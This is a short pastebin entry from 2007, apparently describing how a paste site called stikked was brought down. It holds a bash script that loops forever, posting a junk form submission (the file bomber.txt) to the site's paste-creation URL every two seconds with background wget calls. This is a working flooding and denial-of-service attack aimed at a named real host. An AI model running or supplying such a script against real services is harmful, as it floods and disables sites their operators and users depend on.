- #!/bin/bash
- while [ 1 ]; do
- wget -q -O /dev/null --post-file bomber.txt http://stikked.hippstr.com/index.php/create &
- sleep 2
- done
- And bomber.txt
- "title=h4x&name=1337&lang=text&code=Lorem...."
| Author: Nxt471 | Language: text |
| Description: How stikked went down | Timestamp: 2007-10-17 14:27:56 -0400 |
| View raw paste | Reply |
| View raw paste | Reply |
